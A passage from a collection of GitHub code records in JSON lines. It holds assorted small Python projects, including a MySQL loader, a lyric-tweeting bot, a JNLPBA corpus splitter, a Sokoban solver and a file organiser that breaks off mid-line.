\"\"\"\n credentials = self.credentials\n _run_id = self.run_id\n if run_id is not None:\n _run_id = run_id\n # Create SQLAlchemy engine to connect to MySQL Database\n engine = create_engine(\"mysql+pymysql://{user}:{pw}@{host}/{db}\"\n .format(host=credentials['hostname'], db=credentials['dbname'], user=credentials['uname'],\n pw=credentials['pwd']))\n # Loading bulk data from sql database\n print(f\"..loading {table_name} from sql database..\")\n df = pd.read_sql(f\"select * from {table_name} where RUN_ID = {str(_run_id)};\", con=engine)\n print(\"..complete..\")\n return df\n\n def load_data_to_db(self, df: pd.DataFrame, replace_table: bool=False, table_name: str='bulk_data'):\n \"\"\"\n Loads a table with table_name to the mySQL database.\n :param df: Table to be loaded into database.\n :paran replace_table: Signals if an existing table will be replaced.\n :param table_name: Name of the table to be loaded to the database.\n \"\"\"\n # Credentials to database connection\n credentials = self.credentials\n # Create SQLAlchemy engine to connect to MySQL Database\n engine = create_engine(\"mysql+pymysql://{user}:{pw}@{host}/{db}\".format(host=credentials['hostname'], \n db=credentials['dbname'], user=credentials['uname'],pw=credentials['pwd']))\n # Load dataframe to sql table\n print(\"..loading bulk data to SQL database..\")\n if replace_table:\n df.to_sql(table_name, engine, index=False, if_exists=\"replace\")\n else:\n df.to_sql(table_name, engine, index=False, if_exists=\"append\")\n print(\"..loading complete..\")\n\n","repo_name":"PatKiese/MTG_Market_Watch","sub_path":"DbLoader.py","file_name":"DbLoader.py","file_ext":"py","file_size_in_byte":3631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"28802077430","text":"#lecture fichier data.txt\nf = open(\"data.txt\", \"r\")\n#pour chaque ligne du fichier\nfor line in f: \n\t#on récupère la ligne avec la fonction strip\n\tligne = line.strip()\n\t#test si email est valide\n\tif ligne.find('@') != -1 and ligne.endswith('.com'):\n\t\tprint('email valide')\n\telse:\n\t\tprint(\"email invalide\")\n\n#fermeture fichier\nf.close()","repo_name":"LHerouin/exos_piscine_python","sub_path":"ex22.py","file_name":"ex22.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"71321530557","text":"def binarysearch(a,low,high,ele):\n if(high >= low):\n mid=(high+low)//2\n if(a[mid]==ele):\n return mid\n elif a[mid] > ele:\n return binarysearch(a,low,mid-1,ele)\n else:\n return binarysearch(a,mid+1,high,ele)\n\n else:\n return -1\n\n\narray=[]\nsize=int(input(\"enter the size of array:\"))\nprint(\"enter the array elements are:\")\nfor i in range(size):\n ele=int(input())\n array.append(ele)\nprint(\"the array elements are:\")\nfor i in range(size):\n print(array[i],end=' ')\n\nelement=int(input(\"\\nenter the element to search:\"))\nresult=binarysearch(array,0,len(array)-1,element)\nif(result==-1):\n print(\"element is not found in the array index\")\nelse:\n print(\" element is found in the array index is :\",result)\n\n","repo_name":"shravanimula/Python_oct","sub_path":"sorting_algoritham/binarysearch.py","file_name":"binarysearch.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"42302665570","text":"#!/usr/bin/env python\n\n# Split JNLPBA corpus data into single document per file.\n\n# Data available from\n#\n# http://www-tsujii.is.s.u-tokyo.ac.jp/GENIA/ERtask/report.html\n#\n# Given the JNLPBA data, run this script e.g. as\n#\n# python jnlpbasplit.py -d train/ Genia4ERtask2.iob2\n# python jnlpbasplit.py -d test/ Genia4EReval2.iob2\n\nimport sys\nimport os\nimport re\n\noptions = None\n\n# regular expression for new document start\nNEWDOC_RE = re.compile(r'^###MEDLINE:(\\d+)$')\n\nDEFAULT_SUFFIX = 'conll'\nDEFAULT_DIR = 'JNLPBA'\n\ndef argparser():\n import argparse\n \n ap=argparse.ArgumentParser(description='Split JNLPBA corpus data into ' +\n 'single document per file.')\n ap.add_argument('-s', '--suffix', default=DEFAULT_SUFFIX, metavar='SUFF',\n help='output file suffix (default ' + DEFAULT_SUFFIX + ')')\n ap.add_argument('-d', '--directory', default=DEFAULT_DIR, metavar='DIR',\n help='output directory (default ' + DEFAULT_DIR + ')')\n ap.add_argument('-v', '--verbose', default=False, action='store_true', \n help='verbose output') \n ap.add_argument('data', metavar='DATA', nargs=1, \n help='JNLPBA data (e.g. Genia4ERtask2.iob2)')\n return ap\n\ndef output(lines, PMID):\n global options\n\n if not lines:\n return False\n\n assert PMID is not None, 'Missing PMID'\n\n if PMID not in output.written:\n base = PMID\n else:\n # duplicate PMID; find first numeric affix giving a filename\n # that has not been used.\n i = 2\n while True:\n base = '%s-%d' % (PMID, i)\n if base not in output.written:\n break\n i += 1\n if options.verbose:\n print >> sys.stderr, 'Duplicate PMID %s, writing %s' % (PMID, base)\n\n fn = os.path.join(options.directory, base+'.'+options.suffix)\n with open(fn, 'wt') as f:\n f.write('\\n'.join(lines))\n output.written[base] = True\n\n return True\noutput.written = {}\n\ndef process(fn):\n with open(fn, 'rU') as f:\n PMID = None\n lines = []\n skipempty = False\n for l in f:\n l = l.rstrip('\\n')\n\n if skipempty:\n assert not l or l.isspace(), \\\n 'Missing empty line after PMID %s' % PMID\n skipempty = False\n continue\n\n m = NEWDOC_RE.match(l)\n if m:\n output(lines, PMID)\n PMID = m.group(1)\n lines = []\n # skip empty following PMID line\n skipempty = True\n else:\n lines.append(l)\n\n # last doc\n output(lines, PMID)\n\ndef main(argv=None):\n global options\n\n if argv is None:\n argv = sys.argv\n\n options = argparser().parse_args(argv[1:])\n\n process(options.data[0])\n\n return 0\n\nif __name__ == '__main__':\n sys.exit(main(sys.argv))\n","repo_name":"spyysalo/jnlpba","sub_path":"conversion/jnlpbasplit.py","file_name":"jnlpbasplit.py","file_ext":"py","file_size_in_byte":2963,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"96"} +{"seq_id":"24996703900","text":"import numpy as np\nimport sys\nimport os\nclear = lambda: os.system('cls')\nclear()\n\nsys.path.insert(0, '../lib/')\nimport file_IO as IO\nimport add_label as AL\n\nprint('################### GET FILES ############')\nPS = '\\\\'; print('PS = '+PS+'\\n')\nroot_folder = 'F:'+PS+'Property_of_C_Kawczynski'+PS\nroot = root_folder+'SIMS'+PS+'BC_full'+PS+'results_from_prospectus'+PS\ntarget = root_folder+'SIMS'+PS+'BC_full'+PS+'results_from_prospectus'+PS+'post_processed'+PS\n\nlabel_font_size = 5\nL = AL.init_macro()\nL = AL.set_label_font_size(L,label_font_size)\nX_n_rakes = 2; Xrange = [-.5,0]\nY_n_rakes = 7; Yrange = [-.8,.99]\n\nZ_n_rakes = 3; Zrange = [-1,1]\nX = np.linspace(Xrange[0],Xrange[1],X_n_rakes)\nY = np.linspace(Yrange[0],Yrange[1],Y_n_rakes)\nZ = np.linspace(Zrange[0],Zrange[1],Z_n_rakes)\n# X = [0]\n# Y = [0]\n# Z = [-1.049]\nZ = [0]\n# Z_rake = [-1.049,1.049]\n\nfor x in X:\n\tfor y in Y:\n\t\tfor z in Z:\n\t\t\tL = AL.append_label(L,x,y,z)\n\nIO.set_file_contents('add_mesh_of_labels.mcr','\\n'.join(L))\n# IO.set_file_contents(target+'streamtraces.mcr','\\n'.join(L))\n\n\nprint('\\n Finished')\n\nIO.delete_pyc_files()","repo_name":"charleskawczynski/MOONS","sub_path":"python/post_processing/add_mesh_label/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1095,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"96"} +{"seq_id":"220641727","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Sep 24 19:47:33 2018\r\n\r\n@author: Jared\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport scipy.integrate\r\nfrom scipy.integrate import odeint\r\n\r\n#initial conditions\r\ntini = 0\r\ntfin = 10\r\ntime = np.arange(tini, tfin, .025)\r\ndeg = 15.0 # Anything above around 10 degrees will break the nonlinear approximation\r\ntheta0 = np.radians(deg)\r\navx0 = np.radians(0.0) # Angular velocity\r\n\r\n#define equations and functions\r\ndef simple_pendulum(y0,t):\r\n theta, x = y0\r\n d2theta = [x, -(g/L)*np.sin(theta)]\r\n return d2theta\r\n\r\ndef plot_results(time, theta1, theta2):\r\n plt.plot(time, theta1[:,0], \"r\")\r\n plt.plot(time, theta2)\r\n \r\n plt.title('Pendulum Motion')\r\n plt.xlabel('time(s)')\r\n plt.ylabel('angle (rads)')\r\n plt.grid(True)\r\n plt.legend(['nonlinear', 'linear'], loc='lower right')\r\n plt.show()\r\n \r\n \r\n#parameters\r\ng = 9.8 # m/s^2\r\nL = 1.0 # m\r\n# Find solution to nonlinear problem\r\ntheta1 = odeint(simple_pendulum, [theta0, avx0], time)\r\n\r\n# Find solution to linear problem\r\nomega = np.sqrt(g/L)\r\ntheta2 = [theta0*np.cos(omega*t) for t in time] # Stores as a list in theta2\r\n\r\n# Plot results\r\nplot_results(time, theta1, theta2)\r\n\r\n# Amplitude vs Frequency of Oscillation\r\n","repo_name":"ladosamushia/PHYS639","sub_path":"Pendulum/jmschulerhw2p1.py","file_name":"jmschulerhw2p1.py","file_ext":"py","file_size_in_byte":1470,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"96"} +{"seq_id":"18357638641","text":"import twython, time, sys, random, os, calendar\n\n# Twitter keys stored as config vars in Heroku\nclient = twython.Twython(os.environ['CONSUMER_KEY'], os.environ['CONSUMER_SECRET'], os.environ['ACCESS_KEY'], os.environ['ACCESS_SECRET'])\n\nalbums = {\n\t1: \"TheSunsetTree.txt\",\n\t2: \"Tallahassee.txt\",\n\t3: \"AllHailWestTexas.txt\",\n\t4: \"BeatTheChamp.txt\",\n\t5: \"Goths.txt\",\n\t6: \"TranscendentalYouth.txt\",\n\t7: \"AllEternalsDeck.txt\"\n}\nnumAlbums = len(albums)\n\n# Randomly select an album to tweet from\nlyricsFile = albums[random.randint(1, numAlbums)]\n\n# Read the lyrics file\nfilename = open(lyricsFile,'r')\nf = filename.readlines()\nfilename.close()\n\nstartLine = random.randint(0, len(f) - 1)\n# Don't use blank lines\nwhile f[startLine] == \"\\n\":\n\tstartLine += 1\n\ntweet = f[startLine]\n# Add the next line if there is one, it's not blank, and the resulting tweet isn't over 140 characters\nif (startLine < len(f) - 1) and (f[startLine + 1] != \"\\n\") and (len(tweet + f[startLine + 1]) <= 140):\n\ttweet += f[startLine + 1]\n\n# Print lyric(s) to log and post tweet\nprint(tweet)\nclient.update_status(status=tweet)\n","repo_name":"andynelson34/MtnGoatsBot","sub_path":"mtnGoatsBot.py","file_name":"mtnGoatsBot.py","file_ext":"py","file_size_in_byte":1091,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"36980037895","text":"from __future__ import division, unicode_literals\nimport argparse\nimport pandas as pd\nimport onmt.opts\n\n\ndef get_rank(row, base, max_rank):\n for i in range(1, max_rank+1):\n if row['target'] == row['{}{}'.format(base, i)]:\n return i\n return 0\n\n\ndef main(opt):\n if opt.ignore_last_number:\n with open(opt.targets, 'r') as f:\n targets = [''.join(line.strip().split(' ')[:-1])\n for line in f.readlines()]\n else:\n with open(opt.targets, 'r') as f:\n targets = [''.join(line.strip().split(' '))\n for line in f.readlines()]\n predictions = [[] for i in range(opt.beam_size)]\n\n test_df = pd.DataFrame(targets)\n test_df.columns = ['target']\n\n with open(opt.predictions, 'r') as f:\n # print(len(f.readlines()))\n test_df = test_df.iloc[:int(len(f.readlines())/opt.beam_size)]\n print(len(test_df))\n total = len(test_df)\n with open(opt.predictions, 'r') as f:\n # print(len(f.readlines()))\n if opt.ignore_last_number:\n for i, line in enumerate(f.readlines()):\n\n predictions[i % opt.beam_size].append(\n ''.join(line.strip().split(' ')[:-1]))\n else:\n for i, line in enumerate(f.readlines()):\n\n predictions[i % opt.beam_size].append(\n ''.join(line.strip().split(' ')))\n\n for i, preds in enumerate(predictions):\n test_df['prediction_{}'.format(i + 1)] = preds\n\n test_df['rank'] = test_df.apply(lambda row: get_rank(\n row, 'prediction_', opt.beam_size), axis=1)\n\n correct = 0\n\n for i in range(1, opt.beam_size+1):\n correct += (test_df['rank'] == i).sum()\n\n print('Top-{}: {:.1f}%'.format(i, correct / total * 100))\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(\n description='score_predictions.py',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\n parser.add_argument('-beam_size', type=int, default=5,\n help='Beam size')\n parser.add_argument('-invalid_smiles', action=\"store_true\",\n help='Show % of invalid SMILES')\n parser.add_argument('-predictions', type=str, default=\"\",\n help=\"Path to file containing the predictions\")\n parser.add_argument('-targets', type=str, default=\"\",\n help=\"Path to file containing targets\")\n parser.add_argument('-ignore_last_number', action='store_true',\n help=\"Whether or not to ignore the last number.\")\n opt = parser.parse_args()\n main(opt)\n","repo_name":"wjm41/smi2wyk","sub_path":"smi2wyk/score_predictions.py","file_name":"score_predictions.py","file_ext":"py","file_size_in_byte":2629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"35959223201","text":"import requests\nimport pygame\n\n# Function to create a voiceover from the text response\ndef create_voiceover(text, api_key):\n headers = {\n \"Authorization\": f\"Bearer {api_key}\"\n }\n payload = {\n \"model\": \"tts-1\",\n \"input\": text,\n \"voice\": \"onyx\",\n }\n\n response = requests.post(\"https://api.openai.com/v1/audio/speech\", headers=headers, json=payload)\n return response.content\n\n# Function to save the MP3 data to a file\ndef save_mp3(data, file_path):\n with open(file_path, 'wb') as file:\n file.write(data)\n\n# Function to play the MP3 file\ndef play_mp3(file_path):\n pygame.mixer.init()\n pygame.mixer.music.load(file_path)\n pygame.mixer.music.play()\n while pygame.mixer.music.get_busy(): \n pygame.time.Clock().tick(10)\n","repo_name":"Jukka-Sun/SnippingGPT","sub_path":"voiceover.py","file_name":"voiceover.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"96"} +{"seq_id":"74513294396","text":"#algorithm of Bell-man Ford to find the shortest path in graph\n\ndef court_chemin(gragh, depart):\n dist = {sommet : float('inf') for sommet in graph}\n dist[depart]=0\n for i in range(len(graph)-1):\n for sommet in graph :\n for voisin, poid in graph[sommet].items():\n if dist[sommet]+poid < dist[voisin]:\n dist[voisin]=dist[sommet]+poid\n return dist","repo_name":"Heryklug/court_chelmin","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"30783977970","text":"# O(N) in space and time for solution\n\n\nfrom typing import List, Optional\n\nclass Solution():\n def __init__(self):\n pass\n \n def partition(self, in_list: List[int])-> Optional[List[List[int]]]:\n if len(in_list) < 3:\n return None\n # Get sum\n S = sum(in_list)\n \n # check if divisivle by three\n if S % 3 != 0:\n return None\n \n sum_needed = S / 3\n # go through array subarray sum == S/3 is found \n temp_sum = 0\n start_ind = 0\n FOUND_ALL_SEGMENTS = False\n ret_list = []\n for i, val in enumerate(in_list):\n temp_sum += val\n # if we get sum needed, then we add to result, reset temp_sum, and advance start_ind\n if temp_sum == sum_needed:\n ret_list.append(in_list[start_ind:i+1])\n temp_sum = 0\n start_ind = i+1\n \n # Once we get 2nd to last segment we ared done\n if FOUND_ALL_SEGMENTS:\n ret_list.append(in_list[start_ind:])\n return ret_list\n else:\n FOUND_ALL_SEGMENTS = True\n \n\nin_list = [3, 5, 8, 0, 8]\n\nprint(f\"Segments: {Solution().partition(in_list)}.\")\n\n ","repo_name":"stingram/Simple-Problems","sub_path":"DailyCoding/399_partition_same_sum_3/python/partition_3.py","file_name":"partition_3.py","file_ext":"py","file_size_in_byte":1313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"20271336879","text":"\"\"\"\n\nGiven an integer array nums, find the contiguous subarray (containing at least one number) which has the largest sum and return its sum.\n\nExample:\n\nInput: [-2,1,-3,4,-1,2,1,-5,4],\nOutput: 6\nExplanation: [4,-1,2,1] has the largest sum = 6.\n\n\n\"\"\"\n\ndef max_sub_array(nums:list[int]):\n LagestnoSofar =float('-inf')\n currentSum =0\n for num in nums:\n currentSum += num\n\n if currentSum > LagestnoSofar:\n LagestnoSofar =currentSum\n\n if currentSum < 0:\n currentSum=0\n\n return LagestnoSofar\n\n\nprint(max_sub_array([-2,1,-3,4,-1,2,1,-5,4]))","repo_name":"ChibuezeOnejeme/My_Python_Hackerank_Practice_and_Solutions","sub_path":"max_sub_array.py","file_name":"max_sub_array.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"37870527380","text":"\n'''\n\n Sokoban assignment\n\n\nThe functions and classes defined in this module will be called by a marker script. \nYou should complete the functions and classes according to their specified interfaces.\n\nNo partial marks will be awarded for functions that do not meet the specifications\nof the interfaces.\n\nYou are NOT allowed to change the defined interfaces.\nIn other words, you must fully adhere to the specifications of the \nfunctions, their arguments and returned values.\nChanging the interfacce of a function will likely result in a fail \nfor the test of your code. This is not negotiable! \n\nYou have to make sure that your code works with the files provided \n(search.py and sokoban.py) as your code will be tested \nwith the original copies of these files. \n\nLast modified by 2022-03-27 by f.maire@qut.edu.au\n- clarifiy some comments, rename some functions\n (and hopefully didn't introduce any bug!)\n\n'''\n\n# You have to make sure that your code works with \n# the files provided (search.py and sokoban.py) as your code will be tested \n# with these files\nimport search \nimport sokoban\n\n\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n\ndef my_team():\n '''\n Return the list of the team members of this assignment submission as a list\n of triplet of the form (student_number, first_name, last_name)\n \n '''\n return [ (10891188, 'Asif Reza', 'Chowdhury') ]\n # raise NotImplementedError()\n\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n# Variables\n\n# cell definitions\nmark = {\n \"space\": \" \",\n \"box\": \"$\",\n \"target\":\".\",\n \"wall\":\"#\",\n \"worker\": \"@\",\n \"worker_target\":\"!\",\n \"box_target\":\"*\",\n \"taboo\":\"X\",\n \"removed\":['$','@'],\n \"three_targets\":['.','*','!']\n}\n\n#directions defined\ndirection= {\n \"Up\": (0, -1),\n \"Down\": (0, 1),\n \"Left\": (-1, 0),\n \"Right\": (1, 0)\n}\n\n# the final location in 2D area after a move\ndef moveIn2D(loc,delta):\n return (loc[0]+delta[0], loc[1] + delta[1])\n\n# check walls in four sides\ndef checkWall (index, walls):\n return moveIn2D(index, direction[\"Up\"]) in walls \\\n or moveIn2D(index, direction[\"Down\"]) in walls \\\n or moveIn2D(index, direction[\"Left\"]) in walls \\\n or moveIn2D(index, direction[\"Right\"]) in walls\n\n# check corners\ndef checkCorner(index,walls):\n # Checking top and left cells for wall marks\n if moveIn2D(index, direction[\"Up\"]) in walls \\\n and moveIn2D(index, direction[\"Left\"]) in walls:\n return True\n\n # Checking top and right cells for wall marks\n if moveIn2D(index, direction[\"Up\"]) in walls \\\n and moveIn2D(index, direction[\"Right\"]) in walls:\n return True\n\n # Checking bottom and left cells for wall marks\n if moveIn2D(index, direction[\"Down\"]) in walls \\\n and moveIn2D(index, direction[\"Left\"]) in walls:\n return True\n\n # Checking bottom and right cells for wall marks\n if moveIn2D(index, direction[\"Down\"]) in walls \\\n and moveIn2D(index, direction[\"Right\"]) in walls:\n return True\n\n # for other cases being not a corner\n return False\n\n#used manhattan distance for finding distance between two points\ndef mhDistance(loc1, loc2):\n return (abs(loc1[0] - loc2[0]) + abs(loc1[1] - loc2[1]))\n\n#cells which makes the puzzle not possible to solve\ndef restrictedCells(warehouse):\n def rule1st():\n # looping the rows\n for rowID in range(warehouse.nrows):\n outWall = True\n # looping the columns\n for colID in range(warehouse.ncols):\n matrixID = (colID, rowID)\n square = warehouse2D[rowID][colID]\n if outWall and square == mark[\"wall\"]:\n outWall = False\n\n elif not outWall:\n if all([cell == mark[\"space\"] for cell in warehouse2D[rowID][colID:]]):\n break\n if square == mark[\"space\"] and checkCorner(matrixID, walls):\n warehouse2D[rowID][colID] = mark[\"taboo\"]\n \n def rule2nd():\n # looping the rows\n for rowID in range(warehouse.nrows):\n # looping the columns\n for colID in range(warehouse.ncols):\n matrixID = (colID, rowID)\n square = warehouse2D[rowID][colID]\n if square == mark[\"taboo\"] and checkCorner(matrixID, walls):\n remainingRow = warehouse2D[rowID][colID+1:]\n remainingCol = [row[colID] for row in warehouse2D[rowID+1:]]\n\n for idx, val in enumerate(remainingCol):\n if val == mark[\"wall\"] or val in mark[\"three_targets\"]:\n break\n if val == mark[\"taboo\"] and checkCorner((colID, rowID+idx+1), walls):\n if all([checkWall((colID, loc), walls) for loc in range(rowID+1, rowID+idx+1)]):\n for loc in range(rowID+1, rowID+idx+1):\n warehouse2D[loc][colID] = mark[\"taboo\"]\n \n for idx, val in enumerate(remainingRow):\n if val == mark[\"wall\"] or val in mark[\"three_targets\"]:\n break\n if val == mark[\"taboo\"] and checkCorner((colID+idx+1, rowID), walls):\n if all([checkWall((loc, rowID), walls) for loc in range(colID+1, colID+idx+1)]):\n for loc in range(colID+1, colID+idx+1):\n warehouse2D[rowID][loc] = mark[\"taboo\"]\n\n\n # location of all walls\n walls = warehouse.walls\n\n # converting warehouse to string\n warehouseStr = str(warehouse)\n\n # replacing the cell marks for box and player with space,\n for cell in mark[\"removed\"]:\n warehouseStr = warehouseStr.replace(cell, \" \")\n\n # splitting warehouse string into 2D matrix\n warehouse2D = [list(line) for line in warehouseStr.splitlines()]\n\n # aapplying the rules\n rule1st()\n rule2nd()\n\n #joining sokoban string list to full string\n warehouseStr = '\\n'.join([\"\".join(row) for row in warehouse2D])\n\n # replacing the target marks\n for cell in mark[\"three_targets\"]:\n warehouseStr = warehouseStr.replace(cell, \" \")\n\n return warehouseStr\n\n# - - - - - - - - - - - - - - - - - - - - - - - -\nclass SokobanPuzzle(search.Problem):\n '''\n An instance of the class 'SokobanPuzzle' represents a Sokoban puzzle.\n An instance contains information about the walls, the targets, the boxes\n and the worker.\n\n Your implementation should be fully compatible with the search functions of \n the provided module 'search.py'. \n \n '''\n \n def __init__(self, warehouse):\n self.warehouse = warehouse\n self.cache = {}\n self.initial = warehouse.worker, tuple(warehouse.boxes)\n self.taboo = [sokoban.find_2D_iterator(\n restrictedCells(self.warehouse).splitlines(), mark[\"taboo\"])]\n self.weights = warehouse.weights\n self.boxes = warehouse.boxes\n self.walls = warehouse.walls\n self.goal = warehouse.targets\n\n def actions(self, state):\n \"\"\"\n Return the list of legal actions that can be executed in the given state.\n \n \"\"\"\n # state of worker and box\n workerState = state[0]\n boxState = list(state[1])\n # action list\n actions = []\n\n # looping for directions\n for key in direction.keys():\n nextWorkerState = moveIn2D(workerState, direction.get(key))\n if nextWorkerState in self.walls:\n continue\n # for pushing a box\n if nextWorkerState in boxState:\n nextBoxState = moveIn2D(nextWorkerState, direction.get(key))\n if nextBoxState not in self.walls and \\\n nextBoxState not in self.taboo and \\\n nextBoxState not in boxState:\n actions.append(key)\n else:\n actions.append(key)\n return actions\n\n def result(self, state, action):\n workerState = state[0]\n boxState = list(state[1])\n \n \n # assuming the next worker state\n nextWorkerState = moveIn2D(workerState, direction.get(action))\n\n\n # checking the next worker state for a box\n if nextWorkerState in boxState:\n nextBoxState = moveIn2D(nextWorkerState, direction.get(action))\n box_index = boxState.index(nextWorkerState)\n boxState[box_index] = nextBoxState\n\n\n return nextWorkerState, tuple(boxState)\n\n\n def pathCost(self, k, state1, action, state2):\n if state1[1] != state2[1]:\n box_index = state1[1].index(state2[0])\n box_cost = self.weights[box_index]\n return box_cost + k + 1\n else:\n return k + 1\n\n\n def goalTest(self, state):\n return set(self.goal) == set(state[1])\n\n\n def h(self, n):\n boxes = list(n.state[1])\n worker = n.state[0]\n targets = self.goal\n heuristic = 0\n weights = self.weights\n for idx, box in enumerate(boxes):\n minDistance = float('inf')\n workerDistance = mhDistance(box, worker)\n for target in targets:\n distance = mhDistance(box, target) * (weights[idx] + 1)\n if minDistance > distance:\n minDistance = distance\n heuristic += workerDistance\n heuristic += minDistance\n return heuristic\n\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\ndef check_elem_action_seq(warehouse, action_seq):\n '''\n \n Determine if the sequence of actions listed in 'action_seq' is legal or not.\n \n Important notes:\n - a legal sequence of actions does not necessarily solve the puzzle.\n - an action is legal even if it pushes a box onto a taboo cell.\n \n @param warehouse: a valid Warehouse object\n\n @param action_seq: a sequence of legal actions.\n For example, ['Left', 'Down', Down','Right', 'Up', 'Down']\n \n @return\n The string 'Impossible', if one of the action was not valid.\n For example, if the agent tries to push two boxes at the same time,\n or push a box into a wall.\n Otherwise, if all actions were successful, return \n A string representing the state of the puzzle after applying\n the sequence of actions. This must be the same string as the\n string returned by the method Warehouse.__str__()\n '''\n #looping for actions\n for action in action_seq:\n currentLocation = warehouse.worker #worker location\n if action in list(direction.keys()):\n nextWorkerLocation = moveIn2D(currentLocation, direction.get(action)) #new location of worker\n if nextWorkerLocation in warehouse.walls:\n return \"Impossible\"\n elif nextWorkerLocation in warehouse.boxes:\n nextBoxLocation = moveIn2D(nextWorkerLocation, direction.get(action)) # box location after moving\n if nextBoxLocation in warehouse.walls or nextBoxLocation in warehouse.boxes:\n return \"Impossible\"\n else:\n boxIndex = warehouse.boxes.index(nextWorkerLocation)\n warehouse.boxes[boxIndex] = nextBoxLocation\n else:\n warehouse.worker = nextWorkerLocation\n return warehouse.__str__()\n \n\n\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\ndef solve_weighted_sokoban(warehouse):\n '''\n This function analyses the given warehouse.\n It returns the two items. The first item is an action sequence solution. \n The second item is the total cost of this action sequence.\n \n @param \n warehouse: a valid Warehouse object\n\n @return\n \n If puzzle cannot be solved \n return 'Impossible', None\n \n If a solution was found, \n return S, C \n where S is a list of actions that solves\n the given puzzle coded with 'Left', 'Right', 'Up', 'Down'\n For example, ['Left', 'Down', Down','Right', 'Up', 'Down']\n If the puzzle is already in a goal state, simply return []\n C is the total cost of the action sequence C\n\n '''\n finalSokoban = SokobanPuzzle(warehouse)\n\n # Application of AstarGraphSearch for finding solution\n solution = search.astar_graph_search(finalSokoban)\n\n if solution is None:\n return 'Impossible', None\n else:\n # get one possible action sequence from class Node.solution()\n S = solution.solution()\n # get the total cost\n C = solution.pathCost\n\n return S, C\n\n\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n","repo_name":"asifrezac/socoban-puzzle-solver","sub_path":"mySokobanSolver.py","file_name":"mySokobanSolver.py","file_ext":"py","file_size_in_byte":13029,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"34033072908","text":"class Solution:\n def subarraySum(self, nums: List[int], k: int) -> int:\n total = 0\n pre = {0:1}\n count = 0\n for n in nums:\n total += n\n if total - k in pre:\n count+=pre[total - k]\n pre[total] = pre.get(total, 0) + 1\n return count\n\n\n \n\n\n \n\n ","repo_name":"SimonMekonnen/A2SV","sub_path":"0560-subarray-sum-equals-k/0560-subarray-sum-equals-k.py","file_name":"0560-subarray-sum-equals-k.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"43185789837","text":"import os\r\nimport sys\r\nimport hashlib\r\n\r\n\r\n# Creates folders for different file types\r\ndef makeFolders(downloadDirectory, fileFormats):\r\n for fileFormat in fileFormats:\r\n directory = os.path.join(downloadDirectory, fileFormat)\r\n\r\n if not os.path.exists(directory):\r\n os.makedirs(directory)\r\n\r\n\r\n# Moves file to its proper folder and delete any duplicates\r\ndef moveFile(moveFile, downloadDirectory, fileFormats):\r\n # The file format is what is after the period in the file name\r\n if \".\" in moveFile:\r\n temp = moveFile.split(\".\")\r\n fileFormat = temp[-1]\r\n else:\r\n return\r\n\r\n if fileFormat in fileFormats:\r\n srcPath = os.path.join(downloadDirectory, moveFile)\r\n dstPath = os.path.join(downloadDirectory, fileFormat, moveFile)\r\n\r\n # If the file doesn't have a duplicate in the new folder, move it\r\n try:\r\n with open(dstPath):\r\n # If the file already exists with that name and has the same md5 sum\r\n if checkSum(srcPath) == checkSum(dstPath):\r\n os.remove(srcPath)\r\n print(\"removed \" + srcPath)\r\n except IOError:\r\n os.rename(srcPath, dstPath)\r\n return\r\n\r\n\r\n# Get md5 checksum of a file. Chunk size is how much of the file to read at a time.\r\ndef checkSum(fileDir, chunkSize=8192):\r\n md5 = hashlib.md5()\r\n with open(fileDir, 'rb') as f:\r\n while True:\r\n chunk = f.read(chunkSize)\r\n # If the chunk is empty, reached end of file so stop\r\n if not chunk:\r\n break\r\n md5.update(chunk)\r\n return md5.hexdigest()\r\n\r\n\r\ndef main():\r\n # Dictionary contains file types as keys and lists of their corresponding file formats\r\n fileFormats = [\"Images\", \"Audio\", \"Video\", \"Documents\", \"Installer\", \"Compressed\", \"Virtual Machines and ISO Images\", \"Log Files\", \"SVG\", \"JSON\", \"Outlook\"]\r\n\r\n # The second command line argument is the download directory\r\n downloadDirectory = sys.argv[1]\r\n downloadFiles = os.listdir(downloadDirectory)\r\n makeFolders(downloadDirectory, fileFormats)\r\n\r\n for filename in downloadFiles:\r\n moveFile(filename, downloadDirectory, 